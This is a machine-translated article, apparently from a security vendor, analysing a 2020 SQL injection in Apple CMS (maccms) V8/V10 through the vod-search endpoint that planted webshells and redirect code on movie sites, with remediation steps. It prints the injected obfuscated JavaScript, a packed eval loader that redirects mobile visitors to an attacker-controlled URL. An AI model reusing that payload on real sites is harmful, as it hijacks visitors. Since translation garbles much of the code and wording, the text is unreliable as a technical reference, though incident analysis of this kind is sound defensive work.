Shulou(Shulou.com)05/31 Report--

What is the latest vulnerability patch for Apple maccms? for this question, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible way.

At the beginning of 2020, Apple CMS was exposed with database code execution loopholes, a large number of movie websites were hung up, especially the movie pages were tampered with and implanted with malicious code, and the d_name in the VOD table in the database was all modified, resulting in a direct jump to the S station or pop-up window advertisement after the website was opened. at present, the version of Apple system affected by the maccms vulnerability is V8, V10, and many customer websites have been tampered with repeatedly, very helplessly. Through the introduction of friends to find our SINE security to seek technical support to prevent the website from being linked to the horse. According to the customer's response, the server uses linux centos system, Apple CMS version is the latest V10 version, we immediately set up website security emergency response processing to help customers solve the problem of website attack.

First of all, many webmasters think that it is no problem to upgrade the latest vulnerability patch of Apple CMS. Through the code security analysis of the patch by our SINE security technology, it is found that the vulnerability patch has no effect on the current database code execution vulnerabilities, and the website will continue to be attacked.

Let's take a look at the current hanging horse problem on the customer's website. Opening the home page of the website and each movie address will be inserted into the hanging horse code, as shown in the following figure:

After packing and compressing a copy of the website source code and the nginx website log file, we SINE security engineers found that the website webshell Trojan file was uploaded in the root directory. By tracing the source of the website log, we can see that the access to the PHP script Trojan file is a Korean IP. The specific code is as follows:

The code has been encrypted, and we have decrypted it safely by SINE and found that the function of the code can upload, download, modify the code, operate the database and other functions on the website. It belongs to the category of PHP horse, also known as webshell Trojan file. We also conducted a manual security audit of Apple CMS source code and found that there are loopholes in some malicious code filtering checks done by index.php code on the search module. It can cause an attacker to bypass security filtering and execute SQL insertion code directly into the database.

We conducted a security check on the database and found that the d_name of the VOD table was bulk-implanted with the hang-horse code:

Eval (function) {e=function (c) {return (c35?String.fromCharCode (cwithin 29): c.toString (36))}; if (! '.replace (/ ^ /, String)) {while (CMV -) d [e (c)] = k [c] | e (c); k = [function (e) {return d [e]}; e=function () {return'\\ welling'}; cymbil;} While (Crocade -) if (k [c]) p=p.replace (newPRegExp ('\\ baked accoune (c) +'\\ baked gravity (c)), k [c]); return p;} ('4.5 (\'\');', 14pas | type | javascript | document | write | src | 20487493 | scr | ipt | users | 51 | la'.split ('|), 0, {}); var LOUMtBZeW=navigator ["userAgent"] ["toLowerCase"] () [match "] (/ (ipod | iphone | ipad | android | coolpad | mmp | smartphone | midp | wap | xoom | j2me | blackberry | wince) / I)! If (LOUMtBZeW) {setTimeout ('_ window.location.href= "https://m.qiche-hangjia.com:168/ua80666/"',500)}

This technique is very professional, not the work of ordinary attackers, jump and hide and embed the mobile phone, so that the website operator can not detect it at all, but also judge the source of the cookies, and meet the conditions to trigger the advertisement code implanted by the attacker. Continue security analysis and tracking, found the methods of the attacker, POST submitted to / index.php?m=vod-search,POST content is encrypted here is not convenient to send out, is a vulnerability attack, may cause attacks to other websites using Apple's CMS system, our SINE security technology decrypted the POST attack code and found that it really bypassed the code security filtering of Apple's official V8 Magi V10 system. The hanging horse code is inserted directly into the database.

The root cause of the problem is found. Next, we fix the customer's Apple CMS vulnerability, strictly filter and escape the parameters submitted by POST, cast the malicious characters contained in vod-search, securely intercept malicious code, and prevent the code from being passed into the backend to execute the code in the database. After a comprehensive manual audit and inspection of the Trojan back door in the website code, a total of 5 backdoors were found, the rest were in the cache directory, confused with the program code, were also deleted, the background address of the website was changed, and the address used in the background was mastered by the attacker, and the administrator's account password was strengthened. only then can the problem of Apple CMS website being hung up be completely solved. If your maccms has been hung up all the time, if you know the code, you can safely intercept and check the data from POST to index.php to prevent the insertion of malicious code. If you don't know too much, it is recommended to find a professional website security company to deal with the problem.

This is the answer to the question about what is the latest bug patch for Apple maccms. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.